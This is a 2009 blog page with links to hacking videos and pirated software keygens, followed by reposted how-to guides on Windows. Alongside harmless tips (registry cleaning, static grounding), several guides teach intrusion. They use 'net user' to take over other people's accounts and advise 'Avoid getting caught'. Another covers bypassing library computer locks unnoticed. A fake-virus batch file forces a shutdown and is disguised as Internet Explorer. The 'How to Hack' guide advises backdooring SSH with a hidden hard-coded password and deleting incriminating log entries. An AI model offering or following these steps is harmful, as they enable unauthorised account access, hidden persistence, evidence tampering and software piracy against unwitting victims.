Monday, May 25, 2009

HOW TO HACK COMPUTER PASSWORDS PART 2

http://www.4shared.com/file/101044633/a9a2f0bb/how_to_hack_computer_passwords_-_Google_Video2.html?dirPwdVerified=81832246

HOW TO HACK COMPUTER PASSWORDS PART 1

http://www.4shared.com/file/101044212/eb9a0a73/how_to_hack_computer_passwords_-_Google_Video.html?dirPwdVerified=81832246

HOW TO BECOM A HACKER WITH FEW SKILLS

http://www.4shared.com/file/104096096/270bb391/How_To_Become_A_L33t_Hacker_With_a_Few_Skills_1_Video__5mincom.html?dirPwdVerified=81832246

HOW TO AVOID COMPUTER VIRUSES

http://www.4shared.com/file/104084742/7eefe7b/How_to_avoid_computer_viruses___Wonder_How_To.html?dirPwdVerified=81832246

HACKING TRICK

http://www.4shared.com/file/101061488/931e87c4/Hacking.html?dirPwdVerified=81832246

HACKING YAHOO MESSANGER PASSWORDS

http://www.4shared.com/file/101062885/f600adf3/hacking_yahoo_messenger_password.html?dirPwdVerified=81832246

HACKING YAHOO MESANGER PASSWARDS

http://www.4shared.com/file/101057474/7ffbf22c/hacking_yahoo_messenger_password_-_Google_Video.html?dirPwdVerified=81832246

HACKING YAHOO MAIL

http://www.4shared.com/file/101062656/d039af0e/hacking_yahoo_mail_-_Google_Video.html?dirPwdVerified=81832246

HACKING COMPUTER

http://www.4shared.com/file/101062516/b613d453/hacking_computerS.html?dirPwdVerified=81832246

HACKING COMPUTER PASSWARDS

http://www.4shared.com/file/101061808/52ddf4a8/HACKING_COMPUTER.html?dirPwdVerified=81832246

HACKING

http://www.4shared.com/file/101060573/3a2a4fd1/HACK.html?dirPwdVerified=81832246

COMPUTER TRICKS

http://www.4shared.com/file/101059726/e1bae2f/computers_tricks_-_Google_Video.html?dirPwdVerified=81832246

COMPUTER TRICKS

http://www.4shared.com/file/101058211/525cdc1/cOMPUTER_TRICKS.html?dirPwdVerified=81832246

TRICKS of computer

http://www.4shared.com/file/101057809/4711e132/02797c1203eb30b1.html?dirPwdVerified=81832246

ULTERA MP4 VIDEO CONVERTER WITH KEY GEN

http://www.4shared.com/file/104932861/d239b57b/Ultra_MP4_Video_Converterserial.html

ULTRA MOBILE 3GP VIDEO CONVERTER WITH KEYGEN

http://www.4shared.com/file/104933512/b4158630/Ultra_Mobile_3GP_Video_Converter__serial.html

RM TO MP3 CONVERTER VITH KEYGEN

http://www.4shared.com/file/104933011/2bd71561/rm-mp3-converter_wwwfunmazacom_.html

FLV CONVERTER WITH KEY GEN

http://www.4shared.com/file/104932114/e2c3ecbc/flv-converter-standard-41214.html

CONVERT X TO DVD WITH KEY GEN

http://www.4shared.com/file/104923515/17113a23/ConvertXtoDVD3_v30018_Final_Release_with_Keygen_and_VSO_Application_Cleaner.html

ALLIVE 3GP CONVERTER WITH KEY GEN

http://www.4shared.com/file/104162165/fe3647f0/Alive3GPVideoConverterv2126InclKeygen-DJiNN.html

A One FLV TO AVI MPEG MP3 ETC MANY FORMATS WITH KEYGEN

http://www.4shared.com/file/104162724/e9d0ced0/A-One_FLV_to_AVI_MPEG_WMV_3GP_MP4_iPod_Converter_v43_CLEAN_blaze69.html

Ultra Video Joiner WITH KEYGEN

http://www.4shared.com/file/104161804/c20f4481/_APPS__-_Ultra_Video_Joiner_ver51__With_KeyGen_.html

Allok Avi Mp2 Rm Etc To MP3 Converter WITH KEY GEN

http://www.4shared.com/file/104160844/1edfe6e0/_APPS__-_Allok_-_AVIMPEGWMVRMMp2_toMP3Converterv101_With_Patch_.html

Anny Video Converter Many Formats WITH KEYGEN

http://www.4shared.com/file/104160585/cdb50a29/_Any_Video_Convertor___Many_Formats_.html

Wednesday, May 20, 2009

Any Video Converter

Saturday, May 2, 2009

How to Access Data of a Password Protected User in Windows XP in Case the PC Fails to Boot

You may come across a situation in which your windows XP PC fails to reboot, and the most accepted solution to that problem is to re-format the Hard Disk. Before formatting, you should backup your files. If your computer is password protected, you won't be able to access them from outside, so here is a method for getting around this

1. Boot the machine from Windows XP bootable CD.
2. At the setup screen, select R to repair using Recovery Console.
3. Now the console program will prompt you to select the Windows folder (eg. C:\WINDOWS) where the Windows is installed (you need to enter a number from the list of folders shown to you).
4. Type 'HELP' (without single quotes) and press enter for available commands. This is like a DOS program, but some features are not available.
5. Change the current directory to the user's directory where you want to backup.
6. Type 'CD "C:\Documents and Settings\X"' (without single quotes) and press enter. Where X is the username.
7. Now the current directory will change to "C:\Documents and Settings\X".
8. Now change the directory to Desktop by entering 'CD Desktop' (without single quotes) and press enter to go to the desktop folder.
9. Type 'DIR' (Without single quotes) and press enter, you will be listed all the available files in Desktop.
10. Type 'COPY a.doc D:\BACKUP' (without quotes) and press enter, where a.doc is a file available in Desktop and the folder D:\BACKUP available to copy the files.
11. As in step 7,8,9,10 you can backup other folders like "My Documents", "My Music", etc.
12. Note that you cannot use wildcards for COPY. I.e, you cannot copy all the files in a folder at once. You must copy one file by one.

How to Change a Windows XP Lost Password

So, Lost your Windows XP password, have you? Or much, MUCH worse, you lost the password to your main Computer Administrator! Don't worry- I'll tell you what to do!

1. Before anything else, if you have lost the password of a regular user, ask the computer administrator. If the computer administrator isn't available at the time, you can do the next best thing. Note that you'll have to use the command window.
2. If you CAN log on to another account, skip to step 4. If not, go to the next step.
3. You have to reboot your computer. However, press F8 before it has completely booted, so another black screen shows up. In that black screen, use the arrows up and down to scroll options, the option you want to choose is: "Safe Mode with Command Prompt". Press enter to select that option. Hang in a second. Give it some time to boot; this can take longer than your usual boot-process. When it has booted, you will see the same black screen as in CMD. Go to step 5.
4. If you can log on to another account, you should log in to that account and open the "START" menu. Now, click on "RUN", and type cmd. A black screen will pop up.
5. In the command screen, you'll have to type "net user", followed by the account name that needs password recovery. followed by " *". Note the space between the username and the star. (e.g. "net user bob *")
6. Type in your new password. (You will NOT see any characters) Press enter, and repeat the password. Your password should be changed. Note that if you repeated the passwords with errors it will still say "The command completed successfully". Therefore, if it did not work, try doing it again. If you used another account on your computer to do this, go to step 3 and try that method.

How to Change Windows Time Display to Include Your Name

Did you know that you can edit the Windows Time to include your name? For example, instead of 3:05 PM, 3:05 XXXXXX (Your name). AM and PM would be replaced by your name [or any word(s) that you please]. Here is how to do it

1. Navigate to START → Settings → Control Panel.
2. Double click on Regional and Language Options, if you are in Classic View. Otherwise, click on Date, Time, Language, and Regional Options, then click on Regional Options. You should see the following window:
3. Click on the Customize.
4. Click on the Time tab. You should see:
5. Replace the AM and PM with your first name.
6. Click on Apply.
7. Click on OK. Close the Regional and Language Options window

How to Clean the Windows Registry by Hand

As your registry grows in size, your operating system's performance may be compromised. Third-party registry cleaners may not have the best logic and algorithms to effectively clean all registries. They perform cleaning tasks based upon a predefined set of rules that may not work in your registry, or even a healthy registry, let alone a bloated or corrupted registry.

Fortunately, you can clean your registry manually to remove leftover application entries after uninstalls and unnecessary start-up items.

1. Launch the Windows registry editor.
1. Click on the "Start" button, then select "Run...".
2. Type regedit
inside of the text box. 1.
1. Press "Enter" or click on "Ok".
2. Backup your existing registry before making changes. This will offer a way to undo the changes you make if they negatively impact your operating system or installed software. (See related articles on how to backup your registry. A registry backup is really a critical step, and should be undertaken immediately before beginning any editing of you registry).
1. Click on the "File" menu and select "Export".
2. Select "All" in the "Export range" panel.
3. Choose a location for the backup and then enter a name.
4. Click on "Save".
3. Familiarize yourself with the registry editor. It is broken into two window panes, with the left pane used to show the entire registry tree and the right pane used to show individual values.
4. Browse to remove old applications. Remove any application listings which have already been uninstalled.
1. Expand the "HKEY_CURRENT_USER" key (looks like a folder) by clicking on the plus (+) sign next to it.
2. Expand the "Software" key.
3. Look for keys that contain either the application's name, or more commonly, the application's developer (company name).
4. Highlight a key for the application.
5. Press "Del" to delete it.
5. Search applications by their name, executable name, and/or folder name. Remove any application listings which have already been uninstalled.
1. Press "Ctrl" and "f" to open a find dialog.
2. Enter the text used to search for the application's listings.
3. Click on "Ok" to search. The key or value should be highlighted when found.
4. With the proper key or value highlighted, press "Del" to delete it.
5. Press "F3" to find the next result and repeat.
6. Remove unwanted start-up items. Many of the more popular applications, such as Adobe Reader, Quicktime Player, and Real Player, will install a registry value to load an updater or similar process when Windows starts. To delete these:
1. Expand keys (as done previously) to get to the following location: My Computer\ HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ Current Version
.
1.
1. Highlight the "Run" key.
2. Look for values inside of the left pane. These will be shortcuts to executable files.
3. Highlight a value to remove. If you're not familiar with these, or are unable to guess which ones correlate to which applications, Google for it or use a process search engine such as Process Library
4. Press "Del" to delete it. To select multiple entires to delete, hold down "Shift" or "Ctrl" while clicking.
5. Repeat this process for the same key path inside of the HKEY_CURRENT_USER location as well. If an application installs for "all users", it will put these startup items inside of the the local machine folder. For current user or single user software installs, they will be put into the current user folder.
2. Close the registry editor when finished.
] Tips
· Press the letter the software started with to get there faster if you know its name
· If anything goes wrong, restore your registry with the backup you made. This can be done by opening the backup file directly (ie: double-clicking on it), or using a Windows installer CD to boot to a "recovery" console and restoring it manually.
Warnings
· Editing the registry with the built-in Windows Registry Editor can be a risky endeavor. There is no "undo" functionality if you happen to accidentally delete the wrong key or value.
· Do not edit your registry if you are not comfortable with the process. If you do edit it, be sure to have a backup of it on file. When in doubt, don't delete an entry. Instead, research it online to find out the purpose of any individual key or value.

How to Create a Fake and Harmless Virus

Learn how to create two fake and harmless viruses for windows. This is useful for a prank, getting revenge, etc.. It is safe if you follow the instructions. It's pretty simple

1. Right-click on your desktop, go to "new" and click "Create Shortcut"
2. A window will come up. Where it says "Location" enter: shutdown -s -t
3. The rest of the location is customizable. After the -t, press space and enter the amount of time you want someone to have until shutdown in seconds with only numbers when virus is activated. Press space and enter -c then another space and in quotations, type in a comment that will appear when the computer is shutting down. Click "Next". (example: shutdown -s -t 10 -c "WARNING: VIRUS DETECTED. BEGIN SHUTDOWN")
4. On the next screen, name your virus whatever you want, it will still have the same effect. Click "OK".
5. Your fake virus will be on your desktop as whatever you named it. Click to activate it. If done correctly a shutdown or log-off window will come up with the amount of time, your comment, and a bunch of other stuff. You can not abort the shutdown with task manager by trying to close the window or delete the processes.
6. TO ABORT THE FAKE VIRUS YOU MUST click the Start button on your taskbar and click run. Then type in: shutdown -a
7. Heres another way to make a virus, it's completely harmless, all it does is create a folder in your all programs menu and shutdown your pc =) Open notepad and save as whatever.bat:
8. cls
:A
9. color 0a
10. cls
11. @echo off
12. echo Wscript.Sleep
13. echo Wscript.Sleep 5000>C:\sleep5000.vbs
14. echo Wscript.Sleep 3000>C:\sleep3000.vbs
15. echo Wscript.Sleep 4000>C:\sleep4000.vbs
16. echo Wscript.Sleep 2000>C:\sleep2000.vbs
17. cd%systemroot%\System32
18. dir
19. cls
20. start /w wscript.exe C:\sleep3000.vbs
21. echo Deleting Critical System Files...
22. echo del *.*
23. start /w wscript.exe C:\sleep3000.vbs
24. echo Deletion Successful!25. echo:
26. echo:
27. echo:
28. echo Deleting Root Partition...
29. start /w wscript.exe C:\sleep2000.vbs
30. echo del%SYSTEMROOT%
31. start /w wscript.exe C:\sleep4000.vbs
32. echo Deletion Successful!
33. start /w wscript.exe C:\sleep2000.vbs
34. echo:
35. echo:
36. echo:
37. echo Creating Directory h4x...
38. cd C:\Documents and Settings\All Users\Start Menu\Programs\
39. mkdir h4x
40. start /w wscript.exe C:\sleep3000.vbs
41. echo Directory Creation Successful!
42. echo:
43. echo:
44. echo:
45. echo Execution Attempt 1...
46. start /w wscript.exe C:\sleep3000.vbs
47. echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
48. echo start hax.exe
49. start /w wscript.exe C:\sleep3000.vbs
50. echo Virus Executed!
51. echo:
52. echo:
53. echo:
54. start /w wscript.exe C:\sleep2000.vbs
55. echo Disabling Windows Firewall...
56. start /w wscript.exe C:\sleep2000.vbs
57. echo Killing all processes...
58. start /w wscript.exe C:\sleep2000.vbs
59. echo Allowing virus to boot from startup...
60. start /w wscript.exe C:\sleep2000.vbs
61. echo:
62. echo:
63. echo Virus has been executed successfully!
64. start /w wscript.exe C:\sleep2000.vbs
65. echo:
66. echo Have fun!
67. start /w wscript.exe C:\sleep2000.vbs
68. pause
69. shutdown -f -s 10 -c "Your computer has committed suicide. Have a nice day."
70. For a way to have a bunch of Command Prompts pop up out of nowhere go to notepad and type in "start" alot (don't add quotations)
71. Save it as whatever.bat to your desktop
72. When you open it however many times you typed "start" thats how many times the command prompt will pop up
73. You can disquise it as the Internet Explorer by right clicking on the fake virus and hit properties and find the button that says "Change Icon" then find the internet explorer (or mozilla firefox if you prefer or if you have the icon) icon and double click it
74. It should change automatically after you hit OK
75. To get rid of them all at once wait until it all stops popping up then click CTRL+ALT+DEL and go to task manager and click the top task and hold down CTRL+SHIFT and go down to the last task and then click it (all the tasks should be highlighted) then click "end task" and it should erase all the tasks (now here are the 50 starts)
Tips
· To make your virus more convincing, you could name it Internet Explorer and then right click your shortcut to the virus, click "Properties" than click "Change Icon". Then scroll through the list and click the Internet Explorer icon.
· Alternatively, set your "virus" to execute every time a user logs in by navigating to Start menu-->All Programs-->Startup(Right-Click)-->Open, and copying the shortcut into the folder that opens. Be careful with the shutdown timer's value - too short an interval will make it difficult for even an experienced administrator to deactivate the virus.
· Running batch files like these in full screen can make them even scarier and more convincing. Right click on the icon -> properties -> options -> full screen do not shut computer to early or it may not scare the victim or it wont look like a virus.
· This does not work on Windows 98 so sorry I guess you need to upgrade soon.
Warnings
· Only do this to someone who can handle this prank.
· This may not work if you try to do a file transfer on windows live messenger
· It also may scare people really badly, so remember do this for revenge(e.g someone did a mean prank so then you could use this)
· The example provided can run on Windows.
· This is not completely harmless, since it will shutdown your PC and force you to lose any unsaved work.
Rest assured all should be normal when the computer is turned on again.
· This might affect the way your computer runs or the way another computer that you hacked runs. so only do this if you are a experienced hacker. also I suggest that you save all of your contents onto a thumb drive if you decide to test it out on your computer first. And remember this is in seconds not minutes. so don't type in -5 and think you'll be fine

How to Delete Someone's Windows Password

Do you want access to another user's account on the same computer you use, but their account is password protected? Follow this guide to remove their password

1. Login to Windows on your own account, or your family's account.
2. Click on the Start button.
3. Open your Control Panel. This is located either directly inside the start menu, or under "Settings" -> "Control Panel".
4. Open User Accounts. Double click on the icon in the Control Panel, or select it from the Control Panel menu.
5. Select the account you want to access.
6. Click on Remove Password. Depending upon your version of Windows, this is either a button or inside of a right-click menu.
7. Log off of the current account.
8. Login to the account with the removed password.
Tips
· This guide is only for Windows 2000/XP.
· This will only work if your account has admin privileges, and only if your PC does not login to a domain.
Warnings
· The other user will know that something happened, since their account will no longer require a password. You can add a password to their account, but if you don't know what their existing password was, it will block their access to the system. Avoid getting caught

How to Disable/Enable the Windows XP Welcome Screen

This article allows you to Enable or Disable that classical Windows XP Welcome Screen which welcomes the user with a sky-blue coloured screen, and a number of images, with the respective User Accounts

Steps
1. Click on Start.
2. Click on Control Panel.
3. Double-click on User Accounts.
4. Click on "Change the way users log on or off".
5. Uncheck "Use the Welcome Screen".
6. Click on Apply Options.
7. Close the User Accounts window and the Control Panel.
8. The next time you reboot your computer, the classic login prompt will be used.
Things You'll Need
· Microsoft Windows XP
· Administrator Privileges

How to Do the Mouse Prank

World's most beautiful prank ever. Period. Makes a computer mouse not work and is easily reversed. Has the effect of a computer with a virus, while it's not.

Steps
1. Take a sticky note or tape. Make sure its small enough to not be seen when using the mouse
2. Stick it onto the bottom of the mouse very well so it doesn't come off easy, covering either the roller or the laser thingamabob.
3. Enjoy the chaos. Sit back and wait for your victim!
Tips
· Ways to Improve the Trick:
o Write something on the sticky note, something stupid, like "Osiris wuz here".
o Why a sticky note? Why not clear tape?
o For the ultimate effect, unplug the mouse also, but leave the unplugged cable in clear view of the victim. They will see it. They will probably plug it in and think they have foiled another prank. Ooh, the irony...
Warnings
· Be prepared to take off the sticky note
· Don't be seen doing this.
Things You'll Need
· Working computer
· Mouse
· Sticky note or tape Unsuspecting victim

How to Do Whatever You Want on Library Computers

Many times, you are at the library and want to use some program, like Firefox, to browse the Internet. You might also want to take notes on something, but they won't let you open anything! This is how to do that.

Steps
1. Go to Tools/Internet Options in Internet Explorer.
2. Click the content tab.
3. Go to content adviser and click enable.
4. Make a password and remember it!
5. Set the content settings to whatever level of content you want.
6. Retype your password and go to the website of your choice.
7. After you finish delete history from the general tab of internet options to protect your privacy.
Use Firefox
1. Get a USB flash drive. This will let you get your software onto the computer. If you plan to do heavy duty work from your USB drive, try to get at least a 1 GB drive.
2. Load the PortableApps launcher on your flash drive. You will need to do this at home. Be patient, as it will take a long time to install.
3. Install any Firefox extensions before you leave home. It is also good to install a theme that looks just like Internet Explorer, so no one at the library gets suspicious.
4. Log in to a library computer, and plug your flash drive into the USB port.
5. Open up the PortableApps menu (it is good to write an autorun script to do this, as you probably will not be able to open explorer) and open Firefox. You're done!
Get full functionality
1. Download the latest release of Ubuntu Linux from [1]. Make sure that you get the version for normal computers, as library computers are never 64 bit.
2. Write the large iso file to a CD, and hide it in your pocket.
3. Go to the library, and find a computer that is out of the way and not noticeable.
4. Put in your live CD and kill the power for the computer.
5. Turn the computer back on, and watch as it boots from the CD into a Linux operating system, with no restrictions and limits!
Tips
· Load more than Firefox on your USB drive, so you can do things like image editing and note-taking.
· On the Linux LiveCD, use Ubuntu or Kubuntu, as they have all of the most important applications installed.
· Try this at night, as the librarians are not as alert after a long day.
· If you have a U3 smart usb drive, you can download firefox from the U3 Download Central under web browsers.
· If you want to access the Internet via Linux LiveCD, make sure you know your way around their Internet connection setup wizards, etc. Since most libraries use modems/routers which (as is standard) assign IP addresses via DHCP, and most Linuxes (such as Ubuntu) detect that automatically, this shouldn't be a problem.
· Using a program that forcefully enables taskmanager.exe is recommended, because through task manager you can kill tasks that restrict your computer usage. IE: Programs that log you off after x minutes, etc. In some computers, they will disable Explorer, but using Ctrl+Shift+Esc (or Ctrl+Alt+Del, click Task Manager) will bring up taskmanager.
· Sometimes, simply plugging in a flash drive at the log in screen allows you to bypass it. (The log in screen does not let you minimize it, but Windows XP minimizes it to show you the autoplay window)
· Try speaking constructively to a librarian about your problems with their computers. If you're not doing something malicious, you may be surprised how helpful they are. Remember, most libraries appreciate feedback and may be able to make policy changes, install additional software, etc.
Warnings
· Be very careful when doing this! The librarians are usually very alert, and you will get in trouble if caught.
· If you use PortableApps, do not forget your flash drive when you leave.
· Don't use this for malicious purposes, as it just ruins things for everybody.
· Some administrators may disable USB access or disallow CD boot. However, most computers allow no-BIOS-configuration forced boot through a function key at boot-up. Most of the time, this is F12. Usually it will refer to the CD drive as "IDE CD-ROM DEVICE" or something similar.
Things You'll Need
· 1 GB or more flash drive
· CD
· Internet connection

How to Hack Windows

If you ever needed information on hacking Windows, then here you go. However, keep in mind that this is for learning purposes only

Steps
1. When the computer starts up, hold down F8 before you see the "Windows Starting" screen. This will bring you to a screen with choices. Your best bet will be "Safe Mode with Command Prompt". You can then do as you want.
2. Dialog will appear: you're going to want to go down to the bottom and select "All Files". Then you are going to name the file: Batch.bat. After that, go to where you saved it, and open it. That will open up Command Prompt.
3. However, if the computer has notepad blocked, you can easily go to any web page and then go to "View>View Source". That will easily open up Notepad.
4. After that, you will be able to do as you wish inside command prompt. Here is how to add or delete accounts:
o Add Account: C:>net user USERNAME /add
o Change Accounts password: C:>net user USERNAME * then you'll be able to enter a new password for the account. If you just press enter without typing anything, the account password will be reset.
o Delete Account: C:>net localgroup Administrators# # Another way is to open up notepad, (if its not blocked), and type in "command.com". Then goto File->Save As. A USERNAME /ADD
Tips
· Don't be dumb and mess up someone else's computer. Only do anything like this if you need access to the root of Windows. It was written for learning only. Also, don't try anything unless you know something about DOS.
· Its much more fun to use the Emergency Boot CD... check it out.
Warnings
· Doing this stuff on a computer other than yours is illegal, so don't do it on someone else's, unless you have been given the permission to do so.
· Don't even think about trying this at school. Really, that's just stupid. Not to mention it's not cool to get expelled because you pulled a dumb hacker stunt.

How to Hack Into a Windows User Account

Are you sick of trying to work out someone's password to their Windows account? Well, follow these easy steps to learn how to hack into their account. Be aware that this hack only works if you are an Administrator. You could also use this technique if you forget your password

Steps
1. Go to "Run" on the start menu. (or press Win+R, windows key and letter R)
2. Once on "Run", Type "cmd" into the text box.
3. "Command Prompt" should pop up. It helps to maximize the window so it will be bigger.
4. Then type net user {Username} * {Username} representing the username you want to hack, and press ENTER.
5. Now you are allowed to fill in a password, you can't see your typing but it is there, so make sure you spell right. Press ENTER two times to delete the password on the account so that the account doesn't have a password.
6. Log out and log back in with the hacked account
7. ALTERNATIVE SOLUTION:
8. Use this if you haven't got acces to command prompt, but you do to notepad. (works only if command prompt isn't switched off!, only blocked from starting through regular shortcuts)
9. open up notepad and type:
10. @echo offnet user {username} *
11. again {username} representing the username which you want to hack and this time represtenting a press on enter key on your keyboard (wikiHow formatting is not known to me, sorry)
12. below where you enter the name for your file, change the field (dropdown box) to "all files" in stead of text (.txt) files and save it as "name.bat" (batch file), in this case the title of the file doesn't matter as long as it ends with a .bat extension, however sometimes it does.
13. when you double click the .bat file (open/execute) it a command prompt screen should open and ask you to enter a new password.
Tips
· This works if you have access to command prompt, no admin rights are needed.
· If you want, leave some kind of funny message on that person's username.
· This will likely not work if your account doesn't have the sufficient privilige level. You know this is the case if you receive "System Error 5".
Warnings
· This might get you into a lot of trouble if you are caught while hacking an admin or someone which can not laugh about this joke. Hacking computers that aren't yours without permission is illegal. Only use this guide for educational and/or personal use.

How to Hack

Hacking can be difficult and there are many different ways to hack and many different exploits to use. Hacking is neither defined nor limited by exploitation or exploration. Hacking into someone else's system may be illegal, so don't do it unless you are sure you have permission from the owner of the system you are trying to hack.

Hacking was primarily used for learning new things about systems and computing in general, 'in the good ol' days'. In recent years it has taken dark connotations and in general has been looked down upon. Likewise, many corporations now employ "hackers" to test the strengths and weaknesses of their own systems. These hackers know when to stop, and it is the positive trust they have built that earn them large salaries.

There is a major difference between a hacker and a cracker. A cracker is motivated by malicious reasons; a hacker is attempting to gain knowledge through exploration

Steps
1. Learn a programming language. C++ is very useful, although difficult to learn. Python is much easier to learn, although less flexible. In order to break into web systems, learning server side languages such as PHP will help you immensely. Perl is also a very useful language to learn, as it can be used in many situations, and once you are familiar with the syntax (which is similar to that of C), you will be able to create Perl scripts very quickly.
2. Use a *nix terminal for commands. Cygwin will help emulate this for Windows users. DOS is more limiting than a *nix terminal. The tools in this article can be found for Windows based machines. Nmap particularly, uses WinPCap to run on Windows and does not require Cygwin. However, Nmap works poorly on Windows systems due to the lack of raw sockets. You should also consider using Linux or BSD, which are both more flexible, more reliable, and more secure. Most Linux distributions come with many useful tools pre-installed.
3. Try securing your machine first. Make sure you fully understood all common techniques, including the way to protect yourself.
4.
Know your target. The process of gathering information about your target is known as 'enumeration'. Can you reach the remote system? You can use the ping utility (which is included in most operating systems) to see if the target is 'alive', however, you can not always trust the results of the ping utility, as it relies on the ICMP protocol, which can be easily shut off by paranoid system administrators.
5. Determine the operating system (OS). This is important because how can you gain access to a system if you don't know what the system is? This step involves running a scan of the ports. Try pOf, or nmap to run a port scan. This will show you the ports that are open on the machine, the OS, and can even tell you what type of firewall or router they are using so you can plan a course of action. You can activate OS detection in nmap by using the -O switch.
6. Find some path or open port in the system. Common ports such as FTP (21) and HTTP (80) are often well protected, and possibly only vulnerable to exploits yet to be discovered. Try other TCP and UDP ports that may have been forgotten, such as Telnet and various UDP ports left open for LAN gaming. An open port 22 is usually evidence of an SSH (secure shell) service running on the target, which can sometimes be bruteforced.
7.
Crack the password or authentication process. There are several methods for cracking a password, including brute force. Using brute force on a password is an effort to try every possible password contained within a pre-defined dictionary of brute force software. Users are often discouraged from using weak passwords, so brute force may take a lot of time. You may try using Rainbow Tables for fastest password cracking. Notice that password cracking is good technique only if you already got the hash of password. Trying every possible password while logging to remote machine is not good idea, as it's easily detected by intrusion detection systems, pollute system logs and may take years to complete. Actually it's often much easier to find other way into system, than cracking password.
8. Get super user (root) privileges. Try to get root privileges if targeting a *nix machine, or administrator privileges if taking Windows systems. Most information that will be of vital interest is protected and you need a certain level of authentication to get it. To see all the files on a computer you need super user privileges. This is a user account that is given the same privileges as the "root" user in Linux and BSD operating systems. For routers this is the "admin" account by default (unless it has been changed), for Windows, this is the Administrator account, etc. Just because you have gained access to a connection doesn't mean you can access everything. Only a super user, the administrator account, or the root account can do this.
9. Use various tricks. Often to gain super user status you have use tactics such as creating a "buffer overflow", which is basically causing the memory to dump and allowing you to inject a code or perform a task at a higher level then you're normally authorized. In unix-like systems this will happen if the bugged software has setuid bit set, so program will be executed as different user (superuser for example). Only writing or finding an insecure program that you can execute on their machine will allow you to do this.
10. Create a backdoor. Once you have gained full control over a machine, it's best to make sure you can come back again. This can be done by 'backdooring' an important system service, such as the SSH server. However your backdoor may be removed upon the next system upgrade - really experienced hackers would backdoor the compiler itself, so every compiled software would be a potential way to come back.
11. Cover your tracks. Never ever let the administrator know that the system is compromised. Do not change the website (if any), do not create more files than you really need. Do not create any additional users. Act as fast as possible. If you patched a server like SSHD, make sure it has your secret password hard-coded. If someone tries to login with this password, server should let him in, but shouldn't tell syslog about it.
Tips
· Read books discussing TCP/IP networking.
· This article discusses what is known in the hacking world as "cracking". Hackers are those that built the internet, made Linux, and work on open source software. It is advisable to look into hacking, as it is respected and less likely to get you arrested.
· Using these tactics on a popular corporate or government computer is asking for trouble unless you're a professional hacker. Keep in mind there are people a bit more knowledgeable than you who are protecting these systems for a living. Once found, they sometimes monitor intruders to let them incriminate themselves first before legal action is taken. This means you might think you have free access after hacking into a system, when in fact, you're being watched, and may be stopped at any moment.
· Find information online related to hacking, or to even attend an "underground" hacking event, visit these sites:
o enigmagroup.org A legal and safe network security resource where users test their hacking skills on various challenges and learn about hacking and network security. Also provided are articles, comprehensive and active forums, and guides and tutorials.
o defcon.org Underground hacking event.
o hackthissite.org Hacking site with a large selection of challenges to practice your skills in a safe and legal environment.
o insecure.org Hacking tools and other software.
o securityforest.com Tools, papers, exploits, and other reference material.
o hellboundhackers.org Learn vital skills, complete training "missions, and talk with other experienced hackers to become better. Also get tools, and skills.
Warnings
· Misuse of this information may be a local and/or federal crime. This article is intended to be informational and should only be used for ethical purposes.
· Do not delete entire logfiles, instead, just remove the incriminating entries from the file. What do you think would look more suspicious; logs with a few entries missing, or the entire log file destroyed?
· Be extremely careful if you think you have found a very easy crack or a crude mistake in security management. A security professional that protects that system may be trying to track you or may be setting up a honeypot.
· Stay away from breaking into government networks. If you do find a vulnerability in such a network, the best plan of action is to inform the system administrator, and perhaps help them in patching the vulnerability.
Things You'll Need
· A computer with a connection to the Internet.
· A proxy is always a good idea.
· An IP scanner
· Petraflops help

How to Ground Yourself to Avoid Destroying a Computer with Electrostatic Discharge

Electrostatic discharge (ESD) is a fancy term for common static electricity. Getting a shock from the doorknob may not hurt you much, but the same kind of shock can put your computer in intensive care. Whenever you open the case to work on your PC's innards, you should be aware of ESD and how to avoid it

Steps
1. It is a good idea to buy an anti-static wristband, and follow the instructions for use.(They are sold at most electronics stores.) If you are going to do quite a lot of bench work, you might do well to invest in an anti-static mat.
2. If you don't have a wristband, you are not necessarily out of luck. Assuming that your PC is grounded, you can ground yourself by just keeping one hand in contact with the bare metal frame (not a painted or coated surface) of the computer case. Keep the PC power cord plugged in to a (3-prong) grounded outlet and turn off the rocker switch on the back of the power supply. If the power supply does not have a switch on the back, this won't work, however. Never work on a PC with the power on. In that case, you should buy an anti-static band or try another method of grounding.
3. As an alternative, alter a standard 3-conductor power cord by snipping off the two flat blades, leaving only the grounding portion of the plug. Or simply purchase a cord like this from an electronics supply house. This accomplishes the same thing as turning off the rocker switch.
4. You can employ an LCD Static Discharger. As a simple measure, you can hang it on your key ring and just dangle it. This is less reliable, but when it touches a ground, it should discharge the static electricity. Procedure:①Lightly touch the oval button with a finger. ②Make sure that the end of the conductive material touches a grounded conductor. (such as vehicle, human body, computer, metal or other) to release static electricity, and observe the LCD display.
Tips
· The average person can carry up to 25,000 volts of static charge at any given time. This sounds like a lot, but because the current level is low, you usually won't notice it. Just because you touched the dog's nose and he didn't yelp, it doesn't mean you are safe from ESD. Follow safe ESD procedures any time you open a computer.
· If the equipment is cold, wait until it has reached room temperature. ESD builds up much faster when it's cold and dry (low humidity).
Warnings
· If you don't take steps to prevent ESD, you may regret it. Your computer can sustain serious damage without you knowing it. CPUs and memory chips of any kind are highly vulnerable to ESD. If you fry your PC with static electricity, you may soon start to notice random memory errors, blue screens, and lock-ups. Normally, you can't see (or even feel) ESD, but it is almost always there, so be sure to do the right thing. Your PC will thank you!
· Try not to open up computers on thick carpets, petting long-haired pets, dressing, emptying the dryer, etc. Use common sense; don't do anything that would cause you to get a shock from touching something made of metal.

How to Get Into a Computer Registry

Windows Registry Have you ever wonder how to get into your registry? Did you just simply forget? Well no worries, this will show you how to get into the Windows registry

Steps
1. Click on start. Start is usually located on the bottom of the screen. This is usually on your taskbar. A window will show up with shortcuts to certain files and programs you have.
2. Go to All Programs. You can either click on all programs or just simply put your mouse over it. All programs should be located at the bottom of the window. Now you should be seeing more folders and shortcuts to most of the programs on your computer.
3. Go to Accessories. This folder is mostly located near the top of the other folders, unless it has been moved. Simply put your mouse over Accessories and you will begin to see more folders appear.
4. Go to System or System tools. Once again, just simply place your mouse over the folder and you'll see a small list of programs.
5. Click on System Restore. Once you left click on system restore, a window will pop up. It will give you a choice of restoring your computer or creating a restore point.
6. Create a restore point. All of those are necessary precautions. This could save you $600 or more. Restore points will restore your computer to that date incase you've made a mistake on regedit. Once you've made a restore point, close out of system restore.
7. Go back to start and click run. Once you do this, a small window will pop up.
8. Type in 'regedit' without the quotes. This will bring up your registry. Don't touch anything if you don't know what you're doing.
Tips
· Be sure to backup any changes.
· Study it hard! You can gain a lot of fun!
· With the Regedit you can do almost everything to make your computer safe and more accessible!
Warnings
